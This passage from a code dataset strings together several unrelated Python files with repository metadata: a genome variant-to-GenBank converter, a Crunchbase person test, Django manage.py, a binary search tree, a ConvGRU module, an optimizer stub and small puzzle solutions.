type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
if len(ref) <= MAX_REPLACE_CHARS:
feature.qualifiers['replace'] = ref.lower()
else:
feature.qualifiers['replace'] = '%d base replacement' % len(ref)
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
return True
def handle_snp(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handle a single nucleotide position change.
"""
source_snp_position = variant_data['position']
ref_base = variant_data['ref']
alt_base = variant_data['alt']
snp_size = 1
# First, translate the position to the frame of the updated genome.
snp_position = (
self.runtime_liftover.convert_source_position_to_target(
source_snp_position))
if not snp_position:
# Nothing to do. This exact position has probably been deleted.
return False
# Make sure the ref is what is expected. This is a non-thorough
# but reasonable and bug check.
assert ref_base == self.genome_record.seq[snp_position], (
"Error fixing SNP at "
"source position %d, "
"target position %d, "
"Expected: %s, observed: %s" % (
source_snp_position, snp_position, ref_base,
self.genome_record.seq[snp_position]))
new_seq = (
self.genome_record.seq[:snp_position] +
alt_base +
self.genome_record.seq[snp_position + 1:])
self.genome_record.seq = new_seq
if add_annotation:
# Add feature marking SNP.
snp_feature_location = FeatureLocation(
snp_position, snp_position + snp_size)
snp_feature_id = 'snp_source_%d_%s_to_%s' % (
source_snp_position, ref_base, alt_base)
snp_feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=snp_feature_location,
strand=1,
id=snp_feature_id
)
snp_feature.qualifiers['replace'] = ref_base.lower()
if note:
snp_feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
snp_feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, snp_feature)
# Change as made.
return True
def handle_insertion(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handles an insertion at the position relative to the original
genome.
Args:
variant_data: Dictionary with keys:
* position: Pythonic position for the insertion relative
to the original genome record.
* sequence: The sequence being inserted. One or more bases.
"""
source_position = variant_data['position']
seq = variant_data['sequence']
# First, translate the position to the frame of the updated genome.
target_genome_position = (
self.runtime_liftover.convert_source_position_to_target(
source_position, or_next=True))
# Insert the sequence at the provided position.
insert_sequence_and_update_features(self.genome_record, seq,
target_genome_position, extend_feature_ends=True)
# Update the liftover interval mapping.
self.runtime_liftover.handle_insertion(variant_data)
if add_annotation:
# Add a feature annotating the insertion.
feature_id = 'insertion_source_%s' % (source_position,)
feature_location = FeatureLocation(target_genome_position,
target_genome_position + len(seq))
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
# TODO: This doesn't work with the .tbl format.
# Figure out how to fix this.
# feature.qualifiers['replace'] = ''
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
# Change as made.
return True
def handle_deletion(self, variant_data, add_annotation=True, note=None,
metadata=None):
"""Handles a deletion.
After this operation, the genome_record reflects the deletion.
Args:
variant_data: Dictionary with keys:
* interval: A two-tuple representing pythonic interval for the
deletion, i.e. (inclusive_start, exclusive_end).
e.g. (100, 102) is a deletion of the 2 bases at positions
100 and 101.
* validation_seq: If provided, used to validate that the
interval being deleted is this sequence.
"""
interval = variant_data['interval']
# Inclusive-bounds interval for the target.
target_genome_interval = [
self.runtime_liftover.convert_source_position_to_target(
bound, or_next=True)
for bound in (interval[0], interval[1] - 1)]
assert (bases_in_interval(target_genome_interval) ==
interval[1] - interval[0])
target_genome_interval_pythonic = (
target_genome_interval[0],
target_genome_interval[1] + 1)
delete_interval(self.genome_record, target_genome_interval_pythonic,
validation_seq=variant_data.get('validation_seq', None))
# Update the liftover mapping.
self.runtime_liftover.handle_deletion({
'interval': interval
})
if add_annotation:
# Add a feature annotating the deletion.
# Calculate the target genome interval for the annotation.
# Annotate from the position before the deletion to the position
# after.
target_genome_interval_after_deletion = [
self.runtime_liftover.convert_source_position_to_target(
bound, or_next=True)
for bound in (interval[0] - 1, interval[1])]
feature_id = 'deletion_source_%d-%d' % (
interval[0], interval[1])
feature_location = FeatureLocation(
target_genome_interval_after_deletion[0],
target_genome_interval_after_deletion[1])
feature = SeqFeature(
type=VARIANT_ANNOTATION_TYPE,
location=feature_location,
strand=1,
id=feature_id
)
ref = variant_data.get('validation_seq', '')
if len(ref) <= MAX_REPLACE_CHARS:
feature.qualifiers['replace'] = ref.lower()
else:
feature.qualifiers['replace'] = '%d base deletion' % len(ref)
feature.qualifiers['source_deletion_interval'] = str(interval)
if note:
feature.qualifiers['note'] = note
if metadata:
for key, value in metadata.iteritems():
if value:
feature.qualifiers[key] = value
add_feature_to_seq_record(self.genome_record, feature)
# Change as made.
return True
###############################################################################
# Main procedure entrypoint
###############################################################################
def run(original_genbank_path, output_root, vcf_path, sample_id,
**kwargs):
"""Creates a modified genbank file starting from the original genbank
and applying the changes indicated in the vcf file.
Args:
original_genbank_path: Path to the original genbank file.
output_root: Root of filename, without extension. The extension
will be appended to the name depending on the output type.
vcf_path: Path to the vcf file.
sample_id: Id of the targete in the vcf, e.g. recoli_misq_c31_321D.
kwargs: Optional keyword args. Supported keys:
* liftover_pickle_dest: The output file to write the pickled
liftover interval mapping to.
* output_format: One of 'fasta' or 'genbank'. Defaults to
'genbank'.
* variant_data_csv: If included, will use
update_from_variant_data_csv() rather than standard run.
* verbose: Toggle for amount of informative print statements during
processing.
Returns:
The final SeqRecord that was also written to output.
"""
# Strategy:
# Iterate through the calls in the VCF file and incrementally
# update the genome record. There are tricky subtleties including:
# * The frame of the target genome is constantly changing.
# Nuances: When adding insertions/deletions, this may shift the overall
# frame of the genome downstream from that particular position. We need a
# liftover-like intermediate representation that allows us
# to keep track of these accumulated shifts. For example, every successive
# change that we want to make should have its position updated using
# this method. That way, the annotation can potentially preserve the
# position of the SNP relative to the original record, but we can
# introduce the changes into the underlying sequence and update all
# features appropriately.
if isinstance(original_genbank_path, SeqRecord):
genome_record = original_genbank_path
else:
# Read in the original genome.
genome_record = SeqIO.read(original_genbank_path, 'genbank')
# Get optional manual updates file.
if 'manual_updates_filepath' in kwargs:
manual_updates_filepath = kwargs['manual_updates_filepath']
else:
manual_updates_filepath = None
# Create the object that encapsulates most of the calculation.
vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, vcf_path,
sample_id, manual_updates_filepath)
if 'variant_data_csv' in kwargs:
vcf_to_genbank_maker.update_from_variant_data_csv(
kwargs['variant_data_csv'])
else:
vcf_to_genbank_maker.run(
verbose=kwargs.get('verbose', False),
log_file=kwargs.get('log_file', None))
# Write the final result.
DEFAULT_OUTPUT_FORMAT = 'genbank'
output_format = kwargs.get('output_format', DEFAULT_OUTPUT_FORMAT)
output_path = output_root + '.' + output_format
SeqIO.write(genome_record, output_path, output_format)
# Optional: Pickle the liftover interval mappings.
if 'liftover_pickle_dest' in kwargs:
vcf_to_genbank_maker.runtime_liftover.pickle_interval_mapping(
kwargs['liftover_pickle_dest'])
return genome_record
###############################################################################
# Helpers to evaluate SNP type.
###############################################################################
def _is_snp(ref, alt):
return len(ref) == 1 and alt in ['A', 'T', 'G', 'C']
def _is_deletion(ref, alt):
return _get_deletion(ref, alt) is not None
def _get_deletion(ref, alt):
"""Extracts the portion of ref that is deleted relative to alt.
Returns None if no valid deletion found.
"""
if len(ref) <= len(alt):
return None
if len(alt) == 0:
return ref
# Make sure they are both uppercase for matching procedure below.
ref = ref.upper()
alt = alt.upper()
# Step through the two simultaneously until the first mismatch.
idx = 0
while idx < len(alt):
if ref[idx] != alt[idx]:
break
idx += 1
if idx < len(alt):
# Our definition of deletion requirex the entire alt to be matched.
return None
deletion = ref[idx:]
if not deletion:
return None
return deletion
def _is_insertion(ref, alt):
return _get_insertion(ref, alt) is not None
def _get_insertion(ref, alt):
"""Extracts the portion of alt that inserted relative to alt.
"""
# Just call _get_deletion with params reversed.
return _get_deletion(alt, ref)
###############################################################################
# Other utility methods
###############################################################################
def create_filtered_vcf(vcf_path, out_vcf_path, csv_with_pos_to_keep):
"""Filters the passed in vcf down to the variant calls that we actually
want to add to the updated genbank file.
Writes the results to out_vcf_path.
The reason for this method that cleans up the vcf, rather than just
using the csv directly is that the logic for going from vcf to genbank
will hopefully be re-usable, so we might as take a first stab at it here.
"""
# Positions uniquely identify SNPs (manually confirmed). The provided
# csv file should only have SNPs that we are keeping.
positions_to_keep = set([])
with open(csv_with_pos_to_keep) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
positions_to_keep.add(int(row['POS']))
# Now create a filtered a vcf with only the above positions.
with open(vcf_path) as vcf_fh, open(out_vcf_path, 'w') as out_vcf_fh:
vcf_reader = vcf.Reader(vcf_fh)
vcf_writer = vcf.Writer(out_vcf_fh, vcf_reader)
for record in vcf_reader:
if record.POS in positions_to_keep:
vcf_writer.write_record(record)
def add_TAG_annotations(genome_record):
"""Temporary method for adding our UAG mutations manually.
Mutates the passed in genome_record by adding features for the
amber SNPs.
"""
TAG_ANNOTATION_TYPE = VARIANT_ANNOTATION_TYPE
UAG_LOCATIONS_FILE = os.path.join(
GENOMES_DIR, 'mg1655', 'mg1655_uag_locations.csv')
# Import the list of UAG locations and make the positions 0-indexed
# to be consistent with the BioPython convention.
uag_location_list = []
with open(UAG_LOCATIONS_FILE) as fh:
fh.readline() # Drop the first line
for line in fh.readlines():
uag_location_list.append(int(line.strip()) - 1)
uag_location_list = sorted(uag_location_list)
for current_uag_position in uag_location_list:
current_base = genome_record.seq[current_uag_position]
if current_base == 'G':
alt_base = 'A'
feature_location = FeatureLocation(
current_uag_position - 2,
current_uag_position + 1)
feature_strand = 1
elif current_base == 'C':
alt_base = 'T'
feature_location = FeatureLocation(
current_uag_position,
current_uag_position + 3)
feature_strand = -1
else:
raise AssertionError("Invalid base at position %d: %s" % (
current_uag_position, current_base))
# Update the sequence.
new_seq = (
genome_record.seq[:current_uag_position] +
alt_base +
genome_record.seq[current_uag_position + 1:])
genome_record.seq = new_seq
# Add a feature annotation.
feature_id = 'remove_uag_%d' % current_uag_position
feature = SeqFeature(
type=TAG_ANNOTATION_TYPE,
location=feature_location,
strand=feature_strand,
id=feature_id
)
feature.qualifiers['replace'] = 'tag'
feature.qualifiers['note'] = 'Reassigning UAG'
add_feature_to_seq_record(genome_record, feature)
def get_vcf_metadata():
"""Returns a dictionary with keys being SNP positions and values
being the data from DBG's analysis with SnpEFF etc.
"""
VARIANT_METADATA = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
position_to_data_map = {}
with open(VARIANT_METADATA) as csv_fh:
csv_reader = csv.DictReader(csv_fh)
for row in csv_reader:
position_to_data_map[int(row['POS'])] = {
'EFF_AA': row['EFF_AA'],
'EFF_CODON': row['EFF_CODON'],
'EFF_FUNC': row['EFF_FUNC'],
'EFF_SEV': row['EFF_SEV'],
}
return position_to_data_map
###############################################################################
# Testing and scripting
###############################################################################
if __name__ == '__main__':
MG1655_GENBANK = os.path.join(GENOMES_DIR, 'mg1655', 'mg1655.genbank')
RECOLI_ALL_SNPS = os.path.join(REC1_C321D_ROOT, 'recoli_all_snps.vcf')
C321D_SNPS_VCF = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.vcf')
REC1_C321D_SAMPLE_ID = 'recoli_misq_c31_321D'
REC1_C321D_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT, 'rec1_c321d')
REC1_C321D_PRELIM_OUTPUT_ROOT = os.path.join(REC1_C321D_ROOT,
'rec1_c321d.preliminary')
PICKLE_DEST = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_liftover.pickle')
MANUAL_UPDATES = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_manual_fixes.txt')
# # First filter the edits that we actually want to keep.
# # TODO: Make the run() method take as an optional argument a user-specified
# # argument for filtering which vcf rows are incorporated into the Genbank.
# CSV_WITH_POS_TO_KEEP = os.path.join(REC1_C321D_ROOT, 'rec1_c321d_snps.csv')
# create_filtered_vcf(RECOLI_ALL_SNPS, C321D_SNPS_VCF, CSV_WITH_POS_TO_KEEP)
# Now run the genbank creator.
kwargs = {
'liftover_pickle_dest': PICKLE_DEST,
'manual_updates_filepath': MANUAL_UPDATES,
'output_format': 'genbank',
'verbose': True
}
run(MG1655_GENBANK, REC1_C321D_OUTPUT_ROOT, C321D_SNPS_VCF,
REC1_C321D_SAMPLE_ID, **kwargs)
### Developing manual updates
# REC1_C321D_MANUAL_ONLY_OUT = os.path.join(REC1_C321D_ROOT,
# 'rec1_c321d_manual_only.genbank')
# genome_record = SeqIO.read(MG1655_GENBANK, 'genbank')
# vcf_to_genbank_maker = VCFToGenbankMaker(genome_record, None,
# None, MANUAL_UPDATES)
# vcf_to_genbank_maker.handle_manual_updates()
# SeqIO.write(genome_record, REC1_C321D_MANUAL_ONLY_OUT, 'genbank')
### Developing chain file output.
# runtime_liftover = RuntimeLiftover(genome_record)
# runtime_liftover.pickle_interval_mapping(PICKLE_DEST)
# print runtime_liftover._interval_mapping
# CHAIN_FILE_DEST = os.path.join(GENOMES_DIR, 'mg1655.to.rec1_c321d.chain')
# runtime_2 = RuntimeLiftover.from_pickled_intervals(
# [], PICKLE_DEST)
# runtime_2.write_chain_file(CHAIN_FILE_DEST)
### Generating source genome positions for c321D Genbank SNPs
# OUT_CSV_FIELD_NAMES = ['position', 'ref', 'alt', 'mg1655_position']
# REALIGNED_SNPS_IN = os.path.join(REC1_C321D_ROOT, 'realignment_snps.csv')
# REALIGNED_SNPS_WITH_MG1655_POS = os.path.join(
# REC1_C321D_ROOT, 'realignment_snps_with_mg1655_positions.csv')
# MG1655_GENOME_RECORD = SeqIO.read(MG1655_GENBANK, 'genbank')
# runtime_liftover_obj = RuntimeLiftover.from_pickled_intervals(
# MG1655_GENOME_RECORD, PICKLE_DEST)
# with open(REALIGNED_SNPS_WITH_MG1655_POS, 'w') as out_csv_fh:
# csv_writer = csv.DictWriter(out_csv_fh, OUT_CSV_FIELD_NAMES)
# csv_writer.writeheader()
# with open(REALIGNED_SNPS_IN) as in_csv_fh:
# csv_reader = csv.DictReader(in_csv_fh)
# for row in csv_reader:
# out_row = copy.copy(row)
# # Convert the position. Note the indexing correction.
# c321d_position_pythonic = int(row['position']) - 1
# mg1655_position_pythonic = (
# runtime_liftover_obj.convert_target_position_to_source(
# c321d_position_pythonic))
# if mg1655_position_pythonic is not None:
# # Validation check that the base at that position is
# # correct.
# assert row['ref'][0] == (
# runtime_liftover_obj.source_genome_record.seq[
# mg1655_position_pythonic])
# # Make the position one-indexed to be consistent
# # with the vcf standard.
# mg1655_position = mg1655_position_pythonic + 1
# else:
# mg1655_position = None
# out_row['mg1655_position'] = mg1655_position
# csv_writer.writerow(out_row)
|
[
"gleb.kuznetsov@gmail.com"
] |
gleb.kuznetsov@gmail.com
|
4dece3a51ef8582eafceddbded3f01a224ed82da
|
fd163cf66c9628c3ec626336ceb189336742a973
|
/pathparser.py
|
77e2dcedf816272b3b2a8c35fef25b1228e3cf0d
|
[] |
no_license
|
wmatous/tripserver
|
4fc0d12a3613e0b7eef3dfb036379f3ca14e1bff
|
e66676bf2dd7beb775ee02bcc5946ce07cc49f48
|
refs/heads/master
| 2020-03-21T21:45:22.548694
| 2018-08-01T22:35:54
| 2018-08-01T22:35:54
| 139,082,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
#!/usr/bin/python
class PathParser:
def __init__(self, path = None):
self.path = path
self.components = path.split('/')
del self.components[0]
|
[
"willmatous@gmail.com"
] |
willmatous@gmail.com
|
600d33c5a07fa4f35b148663638b84c707914e99
|
3af8e245768ed96263210b532eaa32defc427138
|
/SI 206 Discussion/discussion.py
|
8de2c25ba39834e9cbc092041ba9cf8126bbd66d
|
[] |
no_license
|
hanacoon1/OLD-hanacoon.github.io
|
083ec0cb0bddfdb9038e18bc89a71e334f545e7b
|
7e32b57def7991c3e18ee391c8a7e5219aca344a
|
refs/heads/master
| 2020-12-23T10:29:44.650593
| 2018-12-27T01:42:34
| 2018-12-27T01:42:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15
|
py
|
asldkfjalsdkfj
|
[
"hanacoon@Hanas-MacBook-Pro-2.local"
] |
hanacoon@Hanas-MacBook-Pro-2.local
|
81d343fe13a8e35e1122f366e78878bab4d952e7
|
8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f
|
/tests/test_person.py
|
43307a82a22e73117afeea3e18ab139709902ab1
|
[
"MIT"
] |
permissive
|
ngzhian/pycrunchbase
|
58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808
|
ead7c93a51907141d687da02864a3803d1876499
|
refs/heads/master
| 2023-07-08T06:18:59.314695
| 2023-07-03T13:27:06
| 2023-07-03T13:27:06
| 30,629,033
| 69
| 45
|
MIT
| 2020-12-02T02:26:40
| 2015-02-11T03:39:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,950
|
py
|
from datetime import datetime
from unittest import TestCase
from pycrunchbase import Person
PERSON_DATA = {
"uuid": "uuid",
"type": "Person",
"properties": {
"permalink": "first-last",
"last_name": "Last",
"first_name": "First",
"bio": "Bio",
"role_investor": True,
"born_on": "2000-01-02",
"born_on_trust_code": 7,
"is_deceased": False,
"died_on": None,
"died_on_trust_code": 0,
"created_at": 1233271545,
"updated_at": 1419596914,
},
"relationships": {
"news": {
"cardinality": "OneToMany",
"paging": {
"total_items": 2,
"first_page_url": "https://api.crunchbase.com/v3.1/person/first-last/news",
"sort_order": "created_at DESC"
},
"items": [
{
"url": "http://example.com/news_1/",
"author": "Author 1",
"posted_on": "2012-12-28",
"type": "PressReference",
"title": "Title 1",
"created_at": 1356743058,
"updated_at": 2012
},
{
"url": "example.com/news_2/",
"author": "Author 2",
"posted_on": "2012-04-20",
"type": "PressReference",
"title": "Title 2",
"created_at": 1334962777,
"updated_at": 2012
},
]
}
}
}
class PersonTestCase(TestCase):
def test_properties(self):
person = Person(PERSON_DATA)
self.assertEqual(person.permalink, 'first-last')
self.assertEqual(person.last_name, 'Last')
self.assertEqual(person.first_name, 'First')
self.assertEqual(person.bio, 'Bio')
self.assertEqual(person.role_investor, True)
self.assertEqual(person.born_on, datetime(2000, 1, 2))
self.assertEqual(person.born_on_trust_code, 7)
self.assertEqual(person.is_deceased, False)
self.assertEqual(person.died_on, None)
self.assertEqual(person.died_on_trust_code, 0)
def test_relationships(self):
person = Person(PERSON_DATA)
self.assertIsNotNone(person.news)
self.assertEqual(2, len(person.news))
|
[
"ngzhian@gmail.com"
] |
ngzhian@gmail.com
|
e8b2a16914817ae9b23bf9c87e2185ba2d4b38bd
|
0c65188b6ce915faa043e7d60415fd04c3185374
|
/socketL/zhangll/client/reader.py
|
d15fa962efc126eb81d6f24d67cc128b7bfbe8b0
|
[
"Apache-2.0"
] |
permissive
|
MaochengXiong/PythonLearning
|
1366eaf1994376422fe70fe2dc4203f4273e3911
|
2b57df0a4e58fd8ea070bb32e48aa6c1e6f62204
|
refs/heads/main
| 2023-07-10T21:31:28.842146
| 2021-07-30T02:33:44
| 2021-07-30T02:33:44
| 388,382,433
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
import threading
import json
import status
class Reader(threading.Thread):
def __init__(self, threadId, socket):
threading.Thread.__init__(self)
self.threadId = threadId
self.socket = socket
def run(self):
while True:
receivedBytes = self.socket.recv(1024)
print(str(receivedBytes))
receivedJson = json.loads(receivedBytes)
code = receivedJson['code']
if code == 3 or code == 5:
status.status = True
print(receivedJson['data'])
|
[
"413700858@qq.com"
] |
413700858@qq.com
|
a92c79b50b41a77df516f9358f62fae691ecf9f4
|
5fa1737735944bf1e6809c7dd0249b0d0c3edf01
|
/manage.py
|
e80f2118c62ac199c9ad644f51999e85f1a1449a
|
[] |
no_license
|
asb404/asb_event
|
ceb8c836093122bbcee975bb1685d24670883349
|
32c30fbb7a305ba82d2d8b1b529da13e209376ca
|
refs/heads/main
| 2023-04-03T04:39:31.805775
| 2021-03-26T19:59:40
| 2021-03-26T19:59:40
| 351,891,863
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 624
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'asb1.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"seeantara@yahoo.com"
] |
seeantara@yahoo.com
|
32f93d2676d08d0f9e28163d5392efbfd5c00aa2
|
724a171bbfea28efded7290adfa11d59e13e96af
|
/droid_slam/modules/gru.py
|
84ea5038fb45bbe8cfd92428d04ce5612d74d43a
|
[
"BSD-3-Clause"
] |
permissive
|
haleqiu/DROID-SLAM
|
f3f2a1fd8dd640f4d41354ddc14a1d997f061558
|
b7e09308d7672d22b28cd23ed401e2b4a4b9bf8d
|
refs/heads/main
| 2023-08-23T06:15:56.626593
| 2021-10-12T19:37:50
| 2021-10-12T19:37:50
| 416,453,062
| 0
| 0
|
BSD-3-Clause
| 2021-10-12T18:29:48
| 2021-10-12T18:29:48
| null |
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
import torch
import torch.nn as nn
class ConvGRU(nn.Module):
def __init__(self, h_planes=128, i_planes=128):
super(ConvGRU, self).__init__()
self.do_checkpoint = False
self.convz = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convr = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convq = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.w = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convz_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convr_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convq_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
def forward(self, net, *inputs):
inp = torch.cat(inputs, dim=1)
net_inp = torch.cat([net, inp], dim=1)
b, c, h, w = net.shape
glo = torch.sigmoid(self.w(net)) * net
glo = glo.view(b, c, h*w).mean(-1).view(b, c, 1, 1)
z = torch.sigmoid(self.convz(net_inp) + self.convz_glo(glo))
r = torch.sigmoid(self.convr(net_inp) + self.convr_glo(glo))
q = torch.tanh(self.convq(torch.cat([r*net, inp], dim=1)) + self.convq_glo(glo))
net = (1-z) * net + z * q
return net
|
[
"zachteed@gmail.com"
] |
zachteed@gmail.com
|
0571408767d239295a03e1f48643a782532e67d4
|
51d4bc60aa2c24c92eb01f5c32eecf2ca0b50640
|
/DSA/binary_tree.py
|
9f33d251f2de3bdd2f7320010e3554c2a385a2bf
|
[] |
no_license
|
kamleshkalsariya/Python_basic
|
be3d090b1b88e761a438fdd4db9926b306f000c8
|
b7292166316f4455e0bb4e47afc61a9341602874
|
refs/heads/main
| 2023-08-18T13:57:44.128992
| 2021-10-13T12:21:41
| 2021-10-13T12:21:41
| 375,887,399
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,672
|
py
|
class BinarySearchTreeNode:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def add_child(self, data):
if data == self.data:
return # node already exist
if data < self.data:
if self.left:
self.left.add_child(data)
else:
self.left = BinarySearchTreeNode(data)
else:
if self.right:
self.right.add_child(data)
else:
self.right = BinarySearchTreeNode(data)
def search(self, val):
if self.data == val:
return True
if val < self.data:
if self.left:
return self.left.search(val)
else:
return False
if val > self.data:
if self.right:
return self.right.search(val)
else:
return False
def in_order_traversal(self):
elements = []
if self.left:
elements += self.left.in_order_traversal()
elements.append(self.data)
if self.right:
elements += self.right.in_order_traversal()
return elements
def find_min(self):
min = self.data
if self.left:
min = self.left.find_min()
return min
def find_max(self):
max = self.data
if self.right:
max = self.right.find_max()
return max
def calculate_sum(self):
s =0
if self.left:
s += self.left.calculate_sum()
s += self.data
if self.right:
s += self.right.calculate_sum()
return s
def pre_order_traversal(self):
element = [self.data]
if self.left:
element += self.left.pre_order_traversal()
if self.right:
element += self.right.pre_order_traversal()
return element
def post_order_traversal(self):
elements = []
if self.left:
elements += self.left.post_order_traversal()
if self.right:
elements += self.right.post_order_traversal()
elements.append(self.data)
return elements
def delete(self, val):
if val < self.data:
if self.left:
self.left = self.left.delete(val)
elif val > self.data:
if self.right:
self.right = self.right.delete(val)
else:
if self.left is None and self.right is None:
return None
elif self.left is None:
return self.right
elif self.right is None:
return self.left
max_val = self.left.find_max()
self.data = max_val
self.left = self.left.delete(max_val)
#min_val = self.right.find_min()
#self.data = min_val
#self.right = self.right.delete(min_val)
return self
def build_tree(elements):
root = BinarySearchTreeNode(elements[0])
for i in range(1,len(elements)):
root.add_child(elements[i])
return root
if __name__ == '__main__':
numbers_tree = build_tree([17,4,1,9,20,18,13,19,23,34])
print(numbers_tree.in_order_traversal())
print(numbers_tree.find_min())
print(numbers_tree.find_max())
print(numbers_tree.calculate_sum())
print(numbers_tree.pre_order_traversal())
print(numbers_tree.post_order_traversal())
print(numbers_tree.delete(20).post_order_traversal())
|
[
"noreply@github.com"
] |
noreply@github.com
|
c0b1d5e12729ae2d4281ed759d0bbf82b7099ad6
|
223286bbb702df3fdc4be40373990ae4431b6339
|
/Project1_2020/project1_py/project1.py
|
599a733141c81031a88a1d0096f538d21b3b30ca
|
[] |
no_license
|
Neethu-nr/aa222
|
a3959044668b56f84ced16c379ed27689af03cd0
|
5b9f999cf8ce5a78b53e7cb23d4594b48f2373c4
|
refs/heads/master
| 2022-09-26T17:38:12.960274
| 2020-06-08T19:42:07
| 2020-06-08T19:42:07
| 255,469,987
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
#
# File: project1.py
#
## top-level submission file
'''
Note: Do not import any other modules here.
To import from another file xyz.py here, type
import project1.xyz
However, do not import any modules except numpy in those files.
It's ok to import modules only in files that are
not imported here (e.g. for your plotting code).
'''
import numpy as np
from project1_py.DescentMethods import Adam, bfgs
def optimize(f, g, x0, n, count, prob):
"""
Args:
f (function): Function to be optimized
g (function): Gradient function for `f`
x0 (np.array): Initial position to start from
n (int): Number of evaluations allowed. Remember `g` costs twice of `f`
count (function): takes no arguments are returns current count
prob (str): Name of the problem. So you can use a different strategy
for each problem. `prob` can be `simple1`,`simple2`,`simple3`,
`secret1` or `secret2`
Returns:
x_best (np.array): best selection of variables found
"""
minimizer = Adam(f=f, g=g)
x, _, _, _ = minimizer.minimize(x0, n)
return x
|
[
"neethurenjith16@gmail.com"
] |
neethurenjith16@gmail.com
|
6a578669b0b8807127f6c38bf5a353544d819155
|
c30b95effe38f0e5afb058a10ed2b091df492e86
|
/algorithms/strings/separateNumbers.py
|
a92b93d3de029bc130aa4e6fc66fa831c3c131da
|
[] |
no_license
|
anikasetia/hackerrank
|
f7fbacf1ac5ef439842dffbe1592ebcd18271547
|
7f2605eb6a373516a8c11e01ffa08d9353395aa4
|
refs/heads/master
| 2021-01-25T09:53:39.934309
| 2018-08-09T15:30:27
| 2018-08-09T15:30:27
| 123,328,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
n = int(input())
strings = []
for i in range(n):
strings.append(input())
for each in strings:
if(each[0] == '0'):
print("NO")
else:
found = False
for i in range(1, len(each)):
initialStart = each[0:i]
start = each[0:i]
startInt = int(each[0:i])
while(len(start) < len(each)):
if(start == each[0:len(start)]):
start += str((startInt) + 1)
startInt += 1
else:
break
if(start == each):
print("YES " + initialStart)
found = True
break
if(not found):
print("NO")
|
[
"anika.setia18@gmail.com"
] |
anika.setia18@gmail.com
|
b3fc34e58ec618b0a2750999d13fbcd8c4e40d6c
|
2041a5a5c84d30884c3c0e14b9efb0c1351f363e
|
/core/unittests/test_nutritionAPI.py
|
f41910403adcbf0ae93251ddaab765c100fc2151
|
[
"MIT"
] |
permissive
|
Z3a1ot/PanPal
|
ca97b00d203bb88077b03fb6583a55c8778f4f88
|
3befdcc471c105804c5790a2deb20836e21b8d74
|
refs/heads/master
| 2021-07-18T09:01:04.371862
| 2017-10-21T18:19:02
| 2017-10-21T18:19:02
| 106,941,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
from unittest import TestCase
from core.recipe_sources.NutritionAPI import NutritionAPI
class TestNutritionAPI(TestCase):
def test_search_recipe(self):
napi = NutritionAPI()
result = napi.search_recipe("burger", 1)
self.assertEqual(len(result), 1)
self.assertIs(type(result[0].id), int)
self.assertIs(type(result[0].name), unicode)
print("{}".format(result))
def test_instructions(self):
napi = NutritionAPI()
recipe_id = 690978
result = napi.get_recipe_instructions(recipe_id)
self.assertGreater(len(result), 0)
for k, v in enumerate(result):
self.assertIs(type(v), unicode)
print("{}".format(result))
|
[
"oleg.tiurin@gmail.com"
] |
oleg.tiurin@gmail.com
|
6023bcb50aafd7b306145186bfcb06bd0caee57f
|
022cbcd9189f8db4a4f003e14ec2f68742acddf5
|
/scary_sphere.py
|
b06aba884ac33ace57bb95da57f7f95b24a3b63e
|
[] |
no_license
|
soggychips/Euler360
|
5d2688afb2788cb13fd88aaba9053c9959c353de
|
f6a6368cd5c443379fcf9dac5ef18f3dbe3fd38b
|
refs/heads/master
| 2021-01-13T02:23:15.439876
| 2014-07-09T04:34:40
| 2014-07-09T04:34:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,916
|
py
|
'''
Problem 360
http://projecteuler.net/problem=360
Given two points (x1,y1,z1) and (x2,y2,z2) in three dimensional space, the Manhattan distance between those points is defined as
